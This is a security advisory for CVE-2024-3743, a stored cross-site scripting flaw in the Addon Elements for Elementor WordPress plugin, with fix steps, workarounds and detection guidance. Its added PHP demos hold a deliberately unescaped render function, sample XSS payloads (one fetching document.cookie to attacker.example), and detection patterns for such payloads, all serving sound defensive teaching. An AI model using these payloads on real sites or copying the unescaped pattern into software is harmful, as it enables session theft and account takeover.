CVE-2024-3743
📋 TL;DR
The Elementor Addon Elements WordPress plugin (slug addon-elements-for-elementor-page-builder) has a stored cross-site scripting vulnerability in several of its widgets: values that an authenticated user with Contributor-level access or higher enters into widget settings are rendered into page markup without adequate escaping. The injected script runs in the browser of anyone who views the affected page, where it can read session cookies or trigger actions in the viewer's session. All versions up to and including 1.13.3 are affected.
💻 Affected Systems
- Elementor Addon Elements WordPress Plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, hijack user sessions, redirect visitors to malicious sites, or perform actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Attackers with contributor access inject malicious scripts that steal user cookies/sessions or display phishing content to visitors, leading to account compromise and data theft.
If Mitigated
With proper user role management and content review processes, the impact is limited to potential defacement or minor data exposure from lower-privileged accounts.
🎯 Exploit Status
Exploitation requires an authenticated account with Contributor-level access or higher that is allowed to edit a page with the Elementor editor. Because the unescaped output appears in several widgets (see the trunk references below), an attacker has multiple places to plant a payload once logged in. Contributors cannot publish, so the typical path is a pending post whose payload fires when an editor or administrator previews or reviews it.
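The following is an added illustration of the bug class, not code from the plugin, the advisory, or the referenced changeset. It shows a generic widget render routine in the vulnerable shape (settings concatenated straight into HTML) beside the hardened shape (each value escaped for the context it lands in). The settings array is constructed; the esc_attr()/esc_html() fallbacks exist only so the file runs outside WordPress.

```php
<?php
// Added illustration, not code from the plugin or the advisory. It shows the
// bug class behind CVE-2024-3743 in generic form: widget settings that a
// contributor controls are concatenated into markup unescaped. esc_attr() and
// esc_html() are WordPress core functions; the fallbacks below exist only so
// this file runs outside WordPress and approximate what core does.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) { return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' ); }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) { return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' ); }
}

// Constructed widget settings, standing in for what a contributor can type into
// the Elementor editor for a widget such as Timeline or Info Circle.
$settings = array(
    'css_id' => 'timeline-1',
    // Breaks out of a double-quoted attribute and adds an event handler.
    'title'  => 'Q1 results" autofocus onfocus="alert(document.cookie)',
    // Stored markup with an event handler; fires as soon as the page renders.
    'text'   => '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
);

// VULNERABLE: every value lands in the HTML exactly as stored.
function render_vulnerable( array $s ): string {
    return '<div id="' . $s['css_id'] . '" title="' . $s['title'] . '">'
         . '<p>' . $s['text'] . '</p></div>';
}

// HARDENED: escape for the context each value is written into. Attribute
// values get esc_attr(); text nodes get esc_html(). A setting that must carry
// limited HTML would go through wp_kses_post() instead of esc_html().
function render_hardened( array $s ): string {
    return '<div id="' . esc_attr( $s['css_id'] ) . '" title="' . esc_attr( $s['title'] ) . '">'
         . '<p>' . esc_html( $s['text'] ) . '</p></div>';
}

echo "vulnerable:\n", render_vulnerable( $settings ), "\n\n";
echo "hardened:\n",   render_hardened( $settings ), "\n";
```

Run it with `php xss-demo.php`. In the vulnerable output both payloads survive intact (the title closes the attribute and adds an onfocus handler; the img tag carries onerror); in the hardened output the quotes and angle brackets are entity-encoded and the browser treats them as text. The actual 1.13.4 change is at the trunk lines listed under References; this block shows the pattern being fixed, not the diff itself.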
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.13.4 or later
Vendor Advisory: https://wordpress.org/plugins/addon-elements-for-elementor-page-builder/#developers
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find 'Addon Elements for Elementor'.
4. Click 'Update Now' if available.
5. Alternatively, download version 1.13.4 or later from WordPress.org and update manually.
🔧 Temporary Workarounds
Temporary Widget Disable
Disable the vulnerable widgets (Image Stack Group, Shape Separator, Content Switcher, Info Circle, Timeline) via Elementor settings or code. Unregistering a widget type removes it from the editor and also stops Elementor from rendering existing instances of it, so sections built with these widgets go blank until you patch; test on a staging copy first.

Add to the active theme's functions.php (or a small must-use plugin):

```php
<?php
// Temporary workaround from this advisory, lightly restructured. The widget type
// names below are as given on this page; confirm them against the plugin's
// widget classes (the value each get_name() returns) before relying on this.
// The elementor/widgets/register hook exists since Elementor 3.5.0, where
// unregister() replaced the older unregister_widget_type().
add_filter( 'elementor/widgets/register', function ( $widgets_manager ) {
    $vulnerable_widgets = array(
        'addon-elements-image-stack',
        'addon-elements-shape-separator',
        'addon-elements-content-switcher',
        'addon-elements-info-circle',
        'addon-elements-timeline',
    );
    foreach ( $vulnerable_widgets as $widget_name ) {
        $widgets_manager->unregister( $widget_name );
    }
} );
```
🧯 If You Can't Patch
- Restrict user roles: audit Contributor-level and higher accounts, remove the ones you do not need, and exclude the Contributor role from the Elementor editor (Elementor → Settings → Role Manager), since the payload is planted through widget settings in that editor
- Implement web application firewall (WAF) rules that inspect POST bodies for script tags and event-handler attributes in Elementor save requests; a WAF only buys time, because encoded or obfuscated payloads can slip past signature rules
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for 'Addon Elements for Elementor' version. If version is 1.13.3 or lower, you are vulnerable.
Check Version:
wp plugin list --name='addon-elements-for-elementor-page-builder' --field=version
Verify Fix Applied:
After updating, verify the plugin version shows 1.13.4 or higher in the WordPress admin panel (or re-run the WP-CLI command above). The fix changes how widget output is rendered; anything a contributor already saved stays in the page data (the `_elementor_data` post meta), so also review pending or recently edited posts from lower-privileged accounts for script tags and event-handler attributes in widget settings.
📡 Detection & Monitoring
Log Indicators:
- POST requests that save Elementor page data (wp-admin/admin-ajax.php) whose body contains script tags, javascript: URLs, or on*= event handlers in widget settings. Standard web server access logs do not record POST bodies, so this needs a WAF or an application-level audit log.
- A burst of Elementor save requests from a single Contributor-level account, or edits by such an account to pages it does not normally touch
Network Indicators:
- Inbound requests carrying script tags or JavaScript in widget parameter names or values, including URL-encoded or HTML-entity-encoded forms of them
SIEM Query:
source="wordpress.log" AND ("addon-elements" OR "widget") AND ("<script" OR "javascript:" OR "onerror=" OR "onload=")
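The SIEM query above matches only literal markers, so a payload that arrives URL-encoded or JSON-escaped is missed. The following added example (not part of the advisory, and not tied to any specific log product) applies the same markers to a handful of constructed application-level log lines after decoding them. The line format, the `user=` and `body=` fields, and the `action=elementor_ajax` value are assumptions made for this demo; adapt the parsing to whatever your WAF or audit-log plugin actually emits.

```php
<?php
// Added example, not part of the advisory. Re-checks the SIEM indicators above
// against constructed log lines after URL-, entity- and JSON-decoding, so
// encoded payloads are not missed. The log format (ts user=<login> POST <path>
// action=<ajax action> body=<raw body>) is an assumption for this demo.

// Constructed sample lines; the second and third carry payloads.
$sampleLog = array(
    '2024-04-15T10:02:11Z user=contrib1 POST /wp-admin/admin-ajax.php action=elementor_ajax body={"settings":{"title":"Quarterly update"}}',
    '2024-04-15T10:05:42Z user=contrib1 POST /wp-admin/admin-ajax.php action=elementor_ajax body={"settings":{"title":"x\" autofocus onfocus=\"alert(document.cookie)"}}',
    '2024-04-15T10:07:03Z user=contrib2 POST /wp-admin/admin-ajax.php action=elementor_ajax body=%7B%22content%22%3A%22%3Cscript%3Efetch(%27//attacker.example%27)%3C%2Fscript%3E%22%7D',
    '2024-04-15T10:09:30Z user=editor1 POST /wp-admin/admin-ajax.php action=heartbeat body=interval=60',
);

// Same markers as the SIEM query, tightened so e.g. "button=" or "condition="
// do not trip the on*= rule (\b requires "on" to start a word).
const XSS_PATTERN = '/<\s*script\b|javascript\s*:|\bon[a-z]+\s*=/i';

// Undo the layers an attacker can hide behind before matching.
function normalize_payload( string $raw ): string {
    $s = rawurldecode( $raw );                                      // %3Cscript%3E -> <script>
    $s = html_entity_decode( $s, ENT_QUOTES | ENT_HTML5, 'UTF-8' ); // &lt;script&gt; -> <script>
    return stripslashes( $s );                                      // JSON \" -> "
}

// Returns user/action/marker for a suspicious line, or null when it is clean
// or does not match the assumed format.
function scan_line( string $line ): ?array {
    if ( ! preg_match( '/user=(\S+) .*?\baction=(\S+) body=(.*)$/', $line, $m ) ) {
        return null;
    }
    $body = normalize_payload( $m[3] );
    if ( ! preg_match( XSS_PATTERN, $body, $hit ) ) {
        return null;
    }
    return array( 'user' => $m[1], 'action' => $m[2], 'marker' => $hit[0] );
}

// Scans a whole log and also counts flagged saves per account, which is the
// "many edits from one contributor" indicator above.
function scan_log( array $lines ): array {
    $hits = array();
    $perUser = array();
    foreach ( $lines as $line ) {
        $hit = scan_line( $line );
        if ( $hit !== null ) {
            $hits[] = $hit + array( 'line' => $line );
            $perUser[ $hit['user'] ] = ( $perUser[ $hit['user'] ] ?? 0 ) + 1;
        }
    }
    return array( 'hits' => $hits, 'per_user' => $perUser );
}

$result = scan_log( $sampleLog );
foreach ( $result['hits'] as $hit ) {
    printf( "[ALERT] user=%s action=%s marker=%s\n", $hit['user'], $hit['action'], $hit['marker'] );
}
foreach ( $result['per_user'] as $user => $count ) {
    printf( "[SUMMARY] %s: %d flagged save(s)\n", $user, $count );
}
```

On the sample data the second line is flagged on `onfocus=` only after the JSON escaping is stripped, and the third on `<script` only after URL decoding; the literal-marker SIEM query above would have caught neither. Decoding before matching also raises false positives (an Editor with unfiltered_html may legitimately save markup), so treat hits as triage input and confirm against the saved `_elementor_data` for the post.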
🔗 References
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/bg-slider/module.php#L269
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/content-switcher/skins/skin-3.php#L43
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/info-circle/skins/skin-base.php#L154
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/shapes/triangle-bottom-right.php#L1
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/timeline/skins/skin-base.php#L1363
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078419%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f36fea15-0475-45ee-b913-790db6373aef?source=cve